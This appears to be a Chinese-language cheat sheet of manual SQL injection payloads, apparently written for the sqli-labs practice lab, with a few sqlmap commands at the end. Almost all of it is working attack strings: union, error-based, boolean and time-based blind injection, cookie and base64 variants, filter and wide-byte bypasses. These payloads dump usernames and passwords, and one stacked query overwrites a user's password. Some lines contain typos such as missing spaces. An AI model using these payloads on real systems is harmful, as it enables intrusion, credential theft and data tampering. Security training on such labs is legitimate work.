sql手工注入

联合
?id=1'  order by 3 --+   最后得出是3列
?id=-1'  union select1,2,3 --+
?id=-1'  union select1,2,database() --+
?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
?id=-1'  union select 1,2,group_concat(table_name)from information_schema.tables where table_schema ='security' --+
?id=-1'  union select 1,2,group_concat(column_name)from information_schema.columns where table_schema ='security' andtable_name='users' --+
?id=-1'  union select1,2,group_concat(concat(username,0x7e,password)) from users --+

报错盲注
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
?id=1' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e))  --+
?id=1' and extractvalue(1,concat(0x7e,(select  substr(group_concat(schema_name),20,20) from information_schema.schemata),0x7e))  --+

布尔盲注
?id=1')) and length(database())=8--+ 
?id=1')) and ascii(substr(database(),1,1))=115 --+
?id=1')) and substr(database(),1,1)='s' --+

延时
?id=1' and sleep(5) --+
?id=1' and if (length(database())=8,sleep(5),0) --+

登录页面post型
uname=Dumb' and 1=1-- &passwd=Dumb
uname=Dumb' and 1=2-- &passwd=Dumb
uname=Dumb' order by 2-- &passwd=Dumb
uname=-Dumb' union select 1,2-- &passwd=Dumb
uname=-Dumb' union select 1,database()-- &passwd=Dumb

布尔+post
uname=Dumb') -- &passwd=Dumb
uname=Dumb')  and updatexml(1,concat(0x7e,database()),1)--&passwd=Dumb

布尔 + post +延时
uname=Dumb'and length(database())=8-- &passwd=Dumb
uname=Dumb") and if (length(database())=8,sleep(5),0)-- &passwd=Dumb

报错+post
uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,database()),1)--+

控制台 cookie
document.cookie="uname=Dumb' and 1=1 --+"
document.cookie="uname=Dumb' and 1=2 --+"
document.cookie="uname=Dumb' order by 3--+"
document.cookie="uname=-Dumb' unionselect 1,2,3 --+"
document.cookie="uname=-Dumb' unionselect 1,2,database() --+"

控制台 cookie +base64编码
document.cookie="uname=Dumb') -- "
document.cookie="uname=RHVtYicpIC0tIA=="
document.cookie="uname= Dumb" order by 3-- "
document.cookie="uname=RHVtYiIgb3JkZXIgYnkgMy0tIA=="
document.cookie="uname=Dumb') and updatexml(1,concat(0x7e,database()),1)--
document.cookie="uname=RHVtYicpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSwxKS0tIA=="

-- 和#被过滤掉
?id=-1' '
?id=-1' union select 1,2,database() '

二次注入
创建账号admin’#   和admin重名，因为#没有被注释，所以还是可以注册，但在修改密码的时候，admin’#的#被注释掉了，修改的其实是admin的密码

空格、and、or、注释过滤
?id=a'union%a0select%a01,2,database()'
%20 %09 %0a %0b %0c %0d %a0 /**/ ，都是空格的代替，最好用的还是%a0.

单引号加括号的联合查询，对注释和空格进行过滤
?id=a')union%a0select(1),(database()),('3

只对union select进行了过滤，使用关键字不行，在url上对union和select之间加入%a0就行
?id=a') union%a0select 1,2,database()--+

参数污染
?id=1 & id=-2' union select1,2,database()--+
?id=1&id=-2" union select 1,2,database()--+

宽字节
?id=1%df' and 1=1 --+
?id=1%df' and 1=2 --+
?id=-1%df' union select 1,2,database() --+
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”security”--+
?id=-1%df' union select 1,2,group_concat(table_name) frominformation_schema.tables where table_schema=0x7365637572697479 --+

宽字节+报错
uname=Dumb�'and updatexml(1,concat(0x7e,database()),1) -- &passwd=Dumb
uname=Dumb汉'and updatexml(1,concat(0x7e,database()),1) -- &passwd=Dumb

堆叠
?id=-1'; update users set password='666' where username='Angelina' --+

---

sqlmap post注入
sqlmap -r 1.txt --dbs

sqlmap -r 1.txt -D Staff--tables

sqlmap -r 1.txt -D Staff -T Users --columns

sqlmap -r 1.txt -D Staff -T Users -C Password,UserID,Username –-dump